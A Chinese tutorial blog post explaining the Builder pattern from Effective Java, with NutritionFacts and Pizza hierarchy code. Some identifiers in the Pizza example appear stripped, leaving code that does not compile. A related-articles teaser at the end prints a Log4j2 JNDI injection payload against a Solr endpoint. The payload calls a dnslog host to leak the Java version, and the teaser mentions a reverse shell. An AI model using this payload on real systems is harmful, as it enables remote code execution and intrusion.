【Effective Java】多构造器参数使用构建器 (快速上手)

news2025/1/12 15:48:38

Java系列文章目录

补充内容 Windows通过SSH连接Linux
第一章 Linux基本命令的学习与Linux历史


文章目录

  • Java系列文章目录
  • 一、前言
  • 二、学习内容:
    • 2.1 为什么引入构建器
    • 2.2 建造者模式
      • 2.2.1书中的例子
      • 2.2.2 例子加上有效性检查
  • 三、问题描述
  • 四、解决方案:
    • 4.1 类层次结构
    • 4.2 父类
    • 4.3 子类
    • 4.3 测试结果
  • 五、总结:

一、前言

对《Effective Java》每条规定总结

  • 第二条:遇到多个构造器参数考虑使用构建器
  • 后面看看能不能再简洁点

二、学习内容:

2.1 为什么引入构建器

🌟重叠构造器:通过构造函数传入参数

缺点如下:

  • 客户端代码会很难编写,并且仍然较难以阅读
  • 如果客户端不小心颠倒了参数的顺序,编译器也不会出错,但是程序在运行时会出现错误的行

🌟JavaBean模式:就是平时常用的getter与setter方法

缺点如下:

  • 在构造过程中JavaBean可能处于不一致的状态
  • JavaBeans模式使得把类做成不可变的可能性不复存在

2.2 建造者模式

🌟 建造者模式:构建器做类似JavaBean模式的操作,参数传递做类似重叠构造器的操作
注意使用条件是要有多个参数的时候

既保证了重叠构造器的安全性又实现了JavaBean模式的可读性

  • Builder模式模拟了具名的可选参数
  • Builder模式也适用于类层次结构

使用步骤:

  1. 不直接生成对象,让用户利用参数调用构造器(或者静态工厂),得到一个builder对象。
NutrutionFacts coke = new NutrutionFacts.Builder(1,2)
  1. 然后客户端在builder对象上调用类似于setter的方法,来设置每个相关的可选参数。
.setFat(1)
.setCalories(1)
  1. 最后,客户端调用无参的build方法来生成通常是不可变的对象。
.build();

.build();对应的构建器方法:

public NutrutionFacts build() {
    return new NutrutionFacts(this);
}

2.2.1书中的例子

为了简洁起见,示例中省略了有效性检查。要想尽快侦测到无效的参数,可以在
builder的构造器和方法中检查参数的有效性。查看不可变量,包括build方法调用的构造
器中的多个参数。为了确保这些不变量免受攻击,从builder复制完参数之后,要检查对象
域(详见第50条)。如果检查失败,就抛出IllegalArgumentException(详见第72
条),其中的详细信息会说明哪些参数是无效的(详见第75条)。
这些后面一条一条讲,之后会补充

  • 在构建器里使用setter方法设置,返回的时候直接通过.build();把设置的参数赋值给对象

注意构造方法是私有的

构建器:

package org.example.entity;

/**
 * 营养成分类,用于存储和管理食品的营养信息
 */
public class NutrutionFacts {

    // 营养成分属性,包括份量大小、份数、卡路里、脂肪、钠和碳水化合物
    private final int servingSize;
    private final int servings;
    private final int calories;
    private final int fat;
    private final int sodium;
    private final int carbohydrate;

    /**
     * 私有构造方法,通过构建器模式创建NutrutionFacts实例
     * @param builder 用于初始化NutrutionFacts实例的构建器对象
     */
    private NutrutionFacts(Builder builder) {
        this.servingSize = builder.servingSize;
        this.servings = builder.servings;
        this.calories = builder.calories;
        this.fat = builder.fat;
        this.sodium = builder.sodium;
        this.carbohydrate = builder.carbohydrate;
    }

    /**
     * 构建器类,用于构建NutrutionFacts实例
     */
    public static class Builder {
        // 必选参数:份量大小和份数
        private final int servingSize;
        private final int servings;

        // 可选参数,默认值为0
        private int calories = 0;
        private int fat = 0;
        private int sodium = 0;
        private int carbohydrate = 0;

        /**
         * 构造方法,初始化必选参数
         * @param servingSize 一份的容量(如毫升或克)
         * @param servings 包含的份数
         */
        public Builder(int servingSize, int servings) {
            this.servingSize = servingSize;
            this.servings = servings;
        }

        // 设置卡路里方法,返回当前构建器实例
        public Builder setCalories(int calories) {
            this.calories = calories;
            return this;
        }

        // 设置脂肪方法,返回当前构建器实例
        public Builder setFat(int fat) {
            this.fat = fat;
            return this;
        }

        // 设置钠含量方法,返回当前构建器实例
        public Builder setSodium(int sodium) {
            this.sodium = sodium;
            return this;
        }

        // 设置碳水化合物方法,返回当前构建器实例
        public Builder setCarbohydrate(int carbohydrate) {
            this.carbohydrate = carbohydrate;
            return this;
        }

        /**
         * 创建并返回一个NutrutionFacts实例
         * @return 使用当前Builder实例的配置创建的NutrutionFacts对象
         */
        public NutrutionFacts build() {
            return new NutrutionFacts(this);
        }
    }

    // 营养成分的getter方法
    public int getServingSize() {
        return servingSize;
    }

    public int getServings() {
        return servings;
    }

    public int getCalories() {
        return calories;
    }

    public int getFat() {
        return fat;
    }

    public int getSodium() {
        return sodium;
    }

    public int getCarbohydrate() {
        return carbohydrate;
    }
}

使用方法:

// 创建一个NutrutionFacts对象来记录可乐的营养信息
NutrutionFacts coke = new NutrutionFacts.Builder(1,2)
        .setFat(1)
        .setCalories(1)
        .build();
  • .build();返回的就是NutrutionFacts实例了

2.2.2 例子加上有效性检查

可以提前了解一下

  • 可以对比上面写法看看区别
package org.example.entity;

/**
 * 营养成分类,用于存储和管理食品的营养信息
 */
public class NutrutionFacts {

    // 营养成分属性,包括份量大小、份数、卡路里、脂肪、钠和碳水化合物
    private final int servingSize;
    private final int servings;
    private final int calories;
    private final int fat;
    private final int sodium;
    private final int carbohydrate;

    /**
     * 私有构造方法,通过构建器模式创建NutrutionFacts实例
     * @param builder 用于初始化NutrutionFacts实例的构建器对象
     */
    private NutrutionFacts(Builder builder) {
        validateServingSize(builder.servingSize);
        validateServings(builder.servings);
        validateCalories(builder.calories);
        validateFat(builder.fat);
        validateSodium(builder.sodium);
        validateCarbohydrate(builder.carbohydrate);

        this.servingSize = builder.servingSize;
        this.servings = builder.servings;
        this.calories = builder.calories;
        this.fat = builder.fat;
        this.sodium = builder.sodium;
        this.carbohydrate = builder.carbohydrate;
    }

    /**
     * 构建器类,用于构建NutrutionFacts实例
     */
    public static class Builder {
        // 必选参数:份量大小和份数
        private final int servingSize;
        private final int servings;

        // 可选参数,默认值为0
        private int calories = 0;
        private int fat = 0;
        private int sodium = 0;
        private int carbohydrate = 0;

        /**
         * 构造方法,初始化必选参数
         * @param servingSize 一份的容量(如毫升或克)
         * @param servings 包含的份数
         */
        public Builder(int servingSize, int servings) {
            this.servingSize = servingSize;
            this.servings = servings;
            validateServingSize(servingSize);
            validateServings(servings);
        }

        // 设置卡路里方法,返回当前构建器实例
        public Builder setCalories(int calories) {
            this.calories = calories;
            validateCalories(calories);
            return this;
        }

        // 设置脂肪方法,返回当前构建器实例
        public Builder setFat(int fat) {
            this.fat = fat;
            validateFat(fat);
            return this;
        }

        // 设置钠含量方法,返回当前构建器实例
        public Builder setSodium(int sodium) {
            this.sodium = sodium;
            validateSodium(sodium);
            return this;
        }

        // 设置碳水化合物方法,返回当前构建器实例
        public Builder setCarbohydrate(int carbohydrate) {
            this.carbohydrate = carbohydrate;
            validateCarbohydrate(carbohydrate);
            return this;
        }

        /**
         * 创建并返回一个NutrutionFacts实例
         * @return 使用当前Builder实例的配置创建的NutrutionFacts对象
         */
        public NutrutionFacts build() {
            return new NutrutionFacts(this);
        }
    }

    // 营养成分的getter方法
    public int getServingSize() {
        return servingSize;
    }

    public int getServings() {
        return servings;
    }

    public int getCalories() {
        return calories;
    }

    public int getFat() {
        return fat;
    }

    public int getSodium() {
        return sodium;
    }

    public int getCarbohydrate() {
        return carbohydrate;
    }

    // 参数有效性检查方法
    private static void validateServingSize(int servingSize) {
        if (servingSize <= 0) {
            throw new IllegalArgumentException("Serving size must be greater than 0");
        }
    }

    private static void validateServings(int servings) {
        if (servings <= 0) {
            throw new IllegalArgumentException("Number of servings must be greater than 0");
        }
    }

    private static void validateCalories(int calories) {
        if (calories < 0) {
            throw new IllegalArgumentException("Calories must be non-negative");
        }
    }

    private static void validateFat(int fat) {
        if (fat < 0) {
            throw new IllegalArgumentException("Fat must be non-negative");
        }
    }

    private static void validateSodium(int sodium) {
        if (sodium < 0) {
            throw new IllegalArgumentException("Sodium must be non-negative");
        }
    }

    private static void validateCarbohydrate(int carbohydrate) {
        if (carbohydrate < 0) {
            throw new IllegalArgumentException("Carbohydrate must be non-negative");
        }
    }
}
  • 方法使用
public class Main {
    public static void main(String[] args) {
        try {
            NutrutionFacts coke = new NutrutionFacts.Builder(1, 2)
                    .setFat(-1) // 无效参数
                    .setCalories(1)
                    .build();

            System.out.println("Serving Size: " + coke.getServingSize());
            System.out.println("Servings: " + coke.getServings());
            System.out.println("Calories: " + coke.getCalories());
            System.out.println("Fat: " + coke.getFat());
            System.out.println("Sodium: " + coke.getSodium());
            System.out.println("Carbohydrate: " + coke.getCarbohydrate());
        } catch (IllegalArgumentException e) {
            System.out.println("Error: " + e.getMessage());
        }
    }
}

三、问题描述

上面已经讲解了建造者模式的使用方法,解决方案里面主要讲实践例子
本人已经加上注释方便理解

重叠构造器缺点如下:

  • 客户端代码会很难编写,并且仍然较难以阅读
  • 如果客户端不小心颠倒了参数的顺序,编译器也不会出错,但是程序在运行时会出现错误的行

JavaBean模式缺点如下:

  • 在构造过程中JavaBean可能处于不一致的状态
  • JavaBeans模式使得把类做成不可变的可能性不复存在

如学习内容所阐述的建造者模式保证了重叠构造器的安全性又实现了JavaBean模式的可读性


四、解决方案:

4.1 类层次结构

同样省略了有效性检查,这些后面几条的之后会合并阐述
上面也举例了有效性检查可以自己适当添加

类层次结构

  • 抽象类 Pizza:这个类可以定义比萨的通用特性,比如大小、配料等。
  • 具体类 Calzone:这些类继承自 Pizza,并实现具体的特性。
  • 抽象Builder:这个类定义了创建比萨的方法,比如配料等。
  • 具体Builder:这些类继承自 Builder,实现了构建各自具体比萨的方法。

4.2 父类

Builder模式也适用于类层次结构。使用平行层次结构的builder时,各自嵌套在相应的类中。抽象类有抽象的builder,具体类有具体的builder。假设用类层次根部的一个抽象类表示各式各样的比萨:

  • Pizza.Builder的类型是泛型,带有一个递归类型参数,(详见第30条)。它和抽象的 self 方法一样,允许在子类中适当地进行方法链接,不需要转换类型

上面那句话的内容进行简要解释

self() 方法的作用:

  • self() 方法返回当前 Builder 实例的引用,以支持链式调用。
  • 它确保了类型安全,并允许方法链的连续调用。

具体实现:

  • NyPizza.Builder 继承自 Pizza.Builder<Builder>
  • NyPizza.Builder 实现了 self() 方法,返回当前 Builder 实例。

addTopping 方法中的调用:

  • 在 addTopping 方法中,每次添加配料后返回当前 Builder 实例,使得可以继续调用其他方法。
  • addTopping 方法返回 self() 方法的结果,即当前 Builder 实例。
package org.example.entity;

import java.util.EnumSet;
import java.util.Objects;
import java.util.Set;

/**
 * 披萨类,用于表示一种披萨及其配料
 */
public class Pizza {
    // 披萨的配料集合,使用Set集合避免重复
    final Set<Topping> toppings;

    /**
     * 披萨的配料枚举,列出了可用的配料选项
     */
    public enum Topping {火腿, 奶酪, 香肠, 蔬菜}

    /**
     * 披萨的构造器类,用于构建披萨对象
     * 使用泛型设计,允许子类在构建过程中修改披萨对象
     */
    public abstract static class Builder<T extends Builder<T>> {
        // 使用EnumSet存储配料,提高效率
        EnumSet<Topping> toppings = EnumSet.noneOf(Topping.class);

        /**
         * 向披萨中添加一种配料
         * @param topping 要添加的配料,不能为空
         * @return 返回Builder的实例,支持链式调用
         */
        public T addTopping(Topping topping) {
            toppings.add(Objects.requireNonNull(topping));
            return self();
        }

        /**
         * 构建并返回一个披萨对象
         * @return 返回构建完成的披萨对象
         */
        abstract Pizza build();

        /**
         * 返回当前Builder的实例,用于链式调用
         * @return 返回Builder的实例
         */
        protected abstract T self();
    }

    /**
     * 构造披萨对象
     * @param builder Builder对象,用于初始化披萨的配料
     */
    Pizza(Builder<?> builder) {
        toppings = builder.toppings.clone();
    }
}

4.3 子类

  • 这里有两个具体的Pizza子类,其中一个表示经典纽约风味的比萨,另一个表示馅料 内置的半月型(calzone)比萨。

  • 前者需要一个尺寸参数,后者则要你指定酱汁应该内置还是外置

package org.example.entity;

import java.util.Objects;

/**
 * 纽约风格披萨类,继承自Pizza基类
 */
public class NyPizza extends Pizza {
    /**
     * 披萨尺寸枚举类,定义了小、中、大三种尺寸
     */
    public enum Size {,,}

    /**
     * 披萨的尺寸,一经设定不可更改
     */
    private final Size size;

    /**
     * NyPizza的构造器类,继承自Pizza.Builder<Builder>
     */
    public static class Builder extends Pizza.Builder<Builder> {
        /**
         * 披萨的尺寸,用于构建NyPizza实例时指定
         */
        private final Size size;

        /**
         * 构造函数,初始化披萨尺寸
         *
         * @param size 披萨的尺寸,不能为空
         */
        public Builder(Size size) {
            this.size = Objects.requireNonNull(size);
        }

        /**
         * 使用当前Builder实例配置构建并返回一个NyPizza实例
         *
         * @return 根据Builder实例配置创建的NyPizza对象
         */
        @Override
        public NyPizza build() {
            return new NyPizza(this);
        }

        /**
         * 用于在递归调用或链式调用中保持当前Builder实例的类型安全
         *
         * @return 当前Builder实例,以继续链式调用
         */
        @Override
        protected Builder self() {
            return this;
        }
    }

    /**
     * 构造函数,用于实例化NyPizza对象
     *
     * @param builder NyPizza的Builder实例,包含所有构建所需的配置
     */
    private NyPizza(Builder builder) {
        super(builder); // 调用父类构造函数
        size = builder.size; // 从Builder中复制披萨尺寸
    }
}
  • 注意,每个子类的构建器中的buila方法,都声明返回正确的子类:NyPizza.Builder
    的build方法返回NyPizza,而Calzone.Builder中的则返回Calzone。

  • 在该方法中,子类方法声明返回超级类声明的返回类型的子类型,这被称作协变返回类型 。它允许客户端无须转换类型就能使用这些构建器。

package org.example.entity;

/**
 * Calzone类继承自Pizza类,代表一种特定的披萨类型 - 卡尔索恩披萨
 * 卡尔索恩披萨的特色之一是酱料可能被包裹在内部
 */
public class Calzone extends Pizza {
    // 指示酱料是否在披萨内部的标志
    private final boolean sauceInside;

    /**
     * Calzone的构造方法,使用Builder模式进行构建
     * @param builder 用于构建Calzone实例的Builder对象
     */
    private Calzone(Builder builder) {
        super(builder);
        sauceInside = builder.sauceInside;
    }

    /**
     * Builder类用于构建Calzone实例,继承自Pizza.Builder<Builder>
     * 该类提供了灵活的API来设置Calzone的属性
     */
    public static class Builder extends Pizza.Builder<Builder> {
        // 默认酱料不在内部的标志
        private boolean sauceInside = false;

        /**
         * 设置酱料在披萨内部的方法
         * @return 返回Builder实例,以支持链式调用
         */
        public Builder sauceInside() {
            sauceInside = true;
            return this;
        }

        /**
         * 构建并返回一个新的Calzone实例
         * @return 新建的Calzone实例
         */
        @Override
        public Calzone build() {
            return new Calzone(this);
        }

        /**
         * 返回当前Builder实例,用于Builder内部方法的类型安全
         * @return 当前Builder实例
         */
        @Override
        protected Builder self() {
            return this;
        }
    }
}

实现类

package org.example;

import org.example.entity.Calzone;
import org.example.entity.NutrutionFacts;
import org.example.entity.NyPizza;
import org.example.entity.Pizza;

public class Main {
    public static void main(String[] args) {
        // 创建一个NutrutionFacts对象来记录可乐的营养信息
        NutrutionFacts coke = new NutrutionFacts.Builder(1,2)
                .setFat(1)
                .setCalories(1)
                .build();
        // 打印可乐的卡路里信息
        System.out.println("卡路里: " + coke.getCalories());
        // 创建一个纽约风格的披萨对象,并添加火腿和奶酪作为配料
        NyPizza pizza = new NyPizza.Builder(NyPizza.Size.)
                .addTopping(Pizza.Topping.火腿)
                .addTopping(Pizza.Topping.奶酪)
                .build();
        // 创建一个Calzone对象,并添加蔬菜作为配料,且酱料在内部
        Calzone calzone = new Calzone.Builder()
                .addTopping(Pizza.Topping.蔬菜).sauceInside().build();

        // 打印披萨和Calzone的信息
        System.out.println("pizza: " + pizza);
        System.out.println("calzone: " + calzone);

    }
}

4.3 测试结果

  • 如果想显示内容可以自行实现toString方法

在这里插入图片描述


五、总结:

  • 简而言之,如果类的构造器或者静态工厂中具有多个参数(4个以上可以)Builder 模式就是一种不错的选择
    特别是当大多数参数都是可选或者类型相同的时候。
  • 与使用重叠构造器模式相比,使用Builder模式的客户端代码将更易于阅读和编写,构建器也比 JavaBeans更加安全

(后续有遇到问题再添加)


声明:如本内容中存在错误或不准确之处,欢迎指正。转载时请注明原作者信息(麻辣香蝈蝈)。

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2115596.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

如何对列表、字符串进行分组

如何对列表、字符串进行分组 1、效果 2、代码 使用python自带库collections中的Counter函数即可实现 代码如下: # -*- coding: utf-8 -*-""" @contact: @file: test.py @time: 2024/9/8 11:18 @author: LDC """ from collections import Co…

Vivado时序报告之Report pulse width详解

目录 一、前言 二、Report pulse width 2.1 Report pulse width 2.2 配置界面 2.3 分析结果 一、前言 在进行时序分析时&#xff0c;除了slack的分析&#xff0c;还存在pulse width的检查&#xff0c;下面将对pulse width检查进行详细说明。在report timing summary报告中…

《粮食科技与经济》是什么级别的期刊?是正规期刊吗?能评职称吗?

​问题解答 问&#xff1a;《粮食科技与经济》是不是核心期刊&#xff1f; 答&#xff1a;不是&#xff0c;是知网收录的第一批认定学术期刊。 问&#xff1a;《粮食科技与经济》级别&#xff1f; 答&#xff1a;省级。主管单位&#xff1a; 湖南省粮食和物资储备局 …

C#发送正文带图片带附件的邮件

1&#xff0c;开启服务&#xff0c;获取授权码。以QQ邮箱为例&#xff1a; 点击管理服务&#xff0c;进入账号与安全页面 2&#xff0c;相关设置参数&#xff0c;以QQ邮箱为例&#xff1a; 登录时&#xff0c;请在第三方客户端的密码输入框里面填入授权码进行验证。&#xff0…

日语输入法平假名和片假名切换

在学日语输入法的时候&#xff0c;我们在使用罗马音输入的时候&#xff0c;在进行平假名和片假名切换&#xff1a; 1、使用电脑在打字&#xff0c;日语输入法切换的时候使用 Shift Alt 如果日语输入法显示为 A 需要切换为 あ的话可以按Caps Lock键 。&#xff08;相当于中文…

【LeetCode】 Z 字形变换

1. 题目 2. 分析 充分地思考问题&#xff0c;然后得出抽象解&#xff0c;最后再写代码。 本题初看是有点儿麻烦的&#xff0c;因为有个N型的变换&#xff0c;但是如果把这个N型压缩一下&#xff0c;其实就是考虑每行放什么值的问题。那么问题就简化成当前的字符串的字符需要放…

C++中的一个标准输出流——cout

目录 开头1.什么是cout?2.C中的一个标准输出流——cout的实际应用打印“Hello, world!”打印大方块打印一个变量 下一篇博客要说的东西 开头 大家好&#xff0c;我叫这是我58。今天&#xff0c;我们要学一下关于C中的一个标准输出流——cout的一些知识。 1.什么是cout? cou…

react js 笔记 3

起因&#xff0c; 目的: 专注。 学习 react js 的时候&#xff0c; 就专注这一方面 &#xff0c;其他都不要碰。 比如&#xff0c; python, C语言&#xff0c; R, 都不看。 只看 js.专注&#xff0c;减少来回切换。 重复。 自己写的笔记&#xff0c;需要反复多看几遍&#xff…

如何使用正则表达式替换字符串中的特定位置数字

如何使用正则表达式替换字符串中的特定位置数字 1、效果 把字符串中的第一个123替换掉: 2、代码 使用正则中的sub函数: re.sub(pattern,repl,string,count=0,flags=0) pattern:表示需要匹配的模式,即需要被替换的字符或字符串。 repl:表示替换后的字符串或函数,用于…

远程代码执行-Log4j2漏洞

1.在vulhub中打开环境 进入环境所在的文件 打开环境 docker-compose up -d 2.浏览器访问打开环境 3.使用dnslog查看是否存在漏洞 solr/admin/cores?action${jndi:ldap://${sys:java.version}.9dbu98.dnslog.cn 发现可以返回java版本 说明存在漏洞 4.开始反弹shell 下载jd…

本地零阶提示优化

本文探讨了如何优化大型语言模型&#xff08;LLM&#xff09;中的提示&#xff08;prompt&#xff09;&#xff0c;以更有效地利用这些黑盒模型的能力。传统的优化方法倾向于寻找全局最优解&#xff0c;但在某些情况下这种做法可能表现不佳。通过对提示优化进行深入的研究&…

Qt/C++编写的Onvif调试助手调试神器工具/支持云台控制/预置位设置等/有手机版本

一、功能特点 广播搜索设备&#xff0c;支持IPC和NVR&#xff0c;依次返回。可选择不同的网卡IP进行对应网段设备的搜索。依次获取Onvif地址、Media地址、Profile文件、Rtsp地址。可对指定的Profile获取视频流Rtsp地址&#xff0c;比如主码流地址、子码流地址。可对每个设备设…

Linux下的PWM驱动

PWM PWM简介⭕ **PWM&#xff08;Pulse Width Modulation&#xff0c;脉冲宽度调制&#xff09;**是一种利用微处理器的数字输出对模拟电路进行控制的技术。通过改变脉冲的占空比&#xff0c;可以控制模拟电路的输出电压或电流。PWM技术广泛应用于电机控制、灯光调节、音频信号…

一份热乎的数据分析(数仓)面试题 | 每天一点点,收获不止一点

目录 1. 已有ods层⽤⼾表为ods_online.user_info&#xff0c;有两个字段userid和age&#xff0c;现设计数仓⽤⼾表结构如 下&#xff1a; 2. 设计数据仓库的保单表&#xff08;⾃⾏命名&#xff09; 3. 根据上述两表&#xff0c;查询2024年8⽉份&#xff0c;每⽇&#xff0c…

【反射知识点详解】

Java中的反射&#xff08;Reflection&#xff09;是一个非常强大的机制&#xff0c;它允许程序在运行时检查或修改类的行为。这种能力主要通过java.lang.reflect包中的类和接口来实现。 通过反射&#xff0c;Java程序可以动态地创建对象、调用方法、访问字段&#xff0c;以及获…

JS_分支结构

if结构 这里的if结构几乎和JAVA中的一样,需要注意的是 if()中的非空字符串会被认为是trueif()中的非零数字会被认为是trueif()中的非空对象会被认为是true <script> if(false){// 非空字符串 if判断为true console.log(true) }else{ console.log(false) } if(){// 长度…

统计进程的CPU和内存占用(最大,均值,90分位)

本文先通过top采集所有进程的CPU和内存情况并保存到文件&#xff0c;然后提取指定进程的数据&#xff0c;最后通过 python 对采集的数据进行可视化。 一、使用脚本采集top数据 1. 单次top输出如下 2. 编写脚本每隔1秒采集一次top数据保存到文件 #!/bin/bash# 按照年月日十分…

非线性建模问题的线性化思考

很长时间没有提笔写博&#xff0c;近两年来一直从事规划领域方面的研究&#xff0c;在熟悉业务的同时&#xff0c;对规划算法也有了新的看法。相比智能算法的概率性&#xff0c;规划算法对求解的精确性要求更高。 本篇博客将围绕非线性问题如何线性化典型问题&#xff0c;分类归…

协同过滤算法相关答辩问题、代码实现过程

我 | 在这里 ⭐ 全栈开发攻城狮、全网10W粉丝、2022博客之星后端领域Top1、专家博主。 &#x1f393;擅长 指导毕设 | 论文指导 | 系统开发 | 毕业答辩 | 系统讲解等。已指导60位同学顺利毕业 ✈️个人公众号&#xff1a;热爱技术的小郑。回复 Java全套视频教程 或 前端全套视频…

大学新生的学习秘诀:如何学习编程?(文末赠书)

1.为什么要学习编程 大学生学习编程不仅关乎个人技能的提升&#xff0c;还涉及到未来的职业发展、创新能力培养以及适应快速变化的社会需求。 (1)增强就业竞争力 当今数字化时代&#xff0c;编程技能已成为许多行业的必备技能。掌握编程能够让你在求职市场上脱颖而出&#x…